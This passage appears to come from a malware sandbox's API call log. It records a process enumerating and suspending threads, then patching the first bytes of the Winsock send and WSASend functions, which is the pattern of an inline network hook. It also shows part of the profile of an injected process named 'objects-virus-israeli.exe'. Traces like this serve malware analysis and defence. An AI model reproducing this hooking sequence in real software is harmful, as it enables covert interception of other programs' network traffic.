(hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.767] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.767] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.767] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.767] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.768] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.768] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.768] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.769] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.769] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.769] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.769] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.770] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.770] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.770] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.771] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.771] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.771] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.771] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.772] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.772] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.772] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.773] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.773] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.773] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.773] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.774] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.774] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.774] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.774] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.775] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.775] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.775] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.776] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.776] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.776] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.776] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.777] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.777] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.777] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.777] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.778] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.885] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1e8) returned 0x8c [0169.885] SuspendThread (hThread=0x8c) returned 0x0 [0169.885] CloseHandle (hObject=0x8c) returned 1 [0169.886] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9bc) returned 0x8c [0169.886] SuspendThread (hThread=0x8c) returned 0x0 [0169.886] CloseHandle (hObject=0x8c) returned 1 [0169.916] CloseHandle (hObject=0x88) returned 1 [0169.916] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0169.917] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0169.917] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x1c4224 | out: lpflOldProtect=0x1c4224*=0x20) returned 1 [0169.917] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x1d0000 [0169.917] RtlMoveMemory (in: Destination=0x1d0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x1d0000) [0169.917] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x1c4224 | out: lpflOldProtect=0x1c4224*=0x40) returned 1 [0169.923] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0169.923] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0169.923] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x1c4224 | out: lpflOldProtect=0x1c4224*=0x20) returned 1 [0169.923] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0169.923] RtlMoveMemory (in: Destination=0x1e0000, Source=0x75bc4406, Length=0x5 | out: Destination=0x1e0000) [0169.924] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x1c4224 | out: lpflOldProtect=0x1c4224*=0x40) returned 1 [0169.928] GetCurrentProcessId () returned 0x314 [0169.928] GetCurrentThreadId () returned 0xa6c [0169.928] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0169.930] Thread32First (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.930] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.930] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.931] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.931] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.931] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.931] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.932] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.932] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.932] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.933] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.933] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.933] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.933] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.934] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.934] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.934] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.934] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.935] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.935] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.935] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.936] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.936] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.936] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.936] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.937] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.937] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.937] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.937] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.938] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.938] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.938] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.939] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.939] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.939] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.940] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.940] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.940] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.940] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.941] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.941] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.941] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.942] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.942] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.942] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.942] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.943] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.943] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.943] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.943] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.944] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.944] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.944] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.945] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.945] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.945] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.945] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.946] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.946] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.946] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.946] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.947] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.947] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.947] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.948] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.948] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.948] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.948] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.949] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.949] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.949] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.949] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.950] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.950] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.950] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.951] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.951] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.951] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.951] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.952] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.952] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.952] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.953] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.953] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.953] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.953] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.954] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.954] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.954] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0169.954] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.004] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.004] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.005] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.005] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.005] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.005] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.006] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.006] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.006] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.007] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.007] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.007] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.007] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.008] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.008] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.008] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.008] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.009] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.009] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.009] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.010] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.010] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.010] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.010] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.011] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.011] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.011] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.011] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.012] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.012] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.012] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.013] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.013] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.013] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.013] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.014] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.014] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.014] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.014] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.015] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.015] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.015] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.016] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.016] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.016] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.016] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.017] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.017] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.017] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.018] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.018] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.018] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.018] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.019] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.019] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.019] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.019] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.020] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.020] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.020] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.021] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.021] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.021] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.021] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.022] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.022] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.022] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.023] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.023] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.023] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.023] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.024] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.024] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.024] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.024] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.025] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.025] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.025] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.026] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.026] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.026] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.026] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.027] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.027] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.027] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.027] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.028] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.028] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.028] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.029] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.029] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.029] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.029] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.030] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.030] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.030] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.030] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.031] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.031] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.031] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.032] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.032] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.032] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.032] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.033] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.033] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.033] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.034] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.034] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.034] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.035] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.035] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.035] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.035] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.036] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.036] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.036] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.037] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.037] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.037] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.037] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.038] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.038] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.038] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.038] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.039] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.039] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.039] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.040] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.040] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.040] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.040] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.041] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.041] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.041] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.041] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.042] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.042] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.042] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.043] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.043] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.043] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.043] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.044] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.044] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.044] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.045] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.045] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.045] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.045] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.046] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.046] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.046] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.046] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.047] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.047] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.047] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.048] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.048] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.048] Thread32Next (hSnapshot=0x88, lpte=0xcafdd8) returned 1 [0170.111] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1e8) returned 0x8c [0170.111] ResumeThread (hThread=0x8c) returned 0x1 [0170.111] CloseHandle (hObject=0x8c) returned 1 [0170.111] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9bc) returned 0x8c [0170.112] ResumeThread (hThread=0x8c) returned 0x1 [0170.112] CloseHandle (hObject=0x8c) returned 1 [0170.234] CloseHandle (hObject=0x88) returned 1 [0170.234] VirtualQuery (in: lpAddress=0x7009e8, lpBuffer=0xcafdcc, dwLength=0x1c | out: lpBuffer=0xcafdcc*(BaseAddress=0x700000, AllocationBase=0x6e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.234] GetProcessHeap () returned 0x6e0000 [0170.234] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7009e8 | out: hHeap=0x6e0000) returned 1 [0170.234] VirtualQuery (in: lpAddress=0x7008d8, lpBuffer=0xcafdcc, dwLength=0x1c | out: lpBuffer=0xcafdcc*(BaseAddress=0x700000, AllocationBase=0x6e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.234] GetProcessHeap () returned 0x6e0000 [0170.234] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7008d8 | out: hHeap=0x6e0000) returned 1 [0170.234] RtlExitUserThread (Status=0x0) Process: id = "28" image_name = "objects-virus-israeli.exe" filename = "c:\\program files\\windows portable devices\\objects-virus-israeli.exe" page_root = "0x655f4000" os_pid = "0x320" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\objects-virus-israeli.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 248 os_tid = 0x9b8 Thread: id = 249 os_tid = 0x438 Thread: id = 250 os_tid = 0x980 [0169.505] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0169.506] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0169.506] 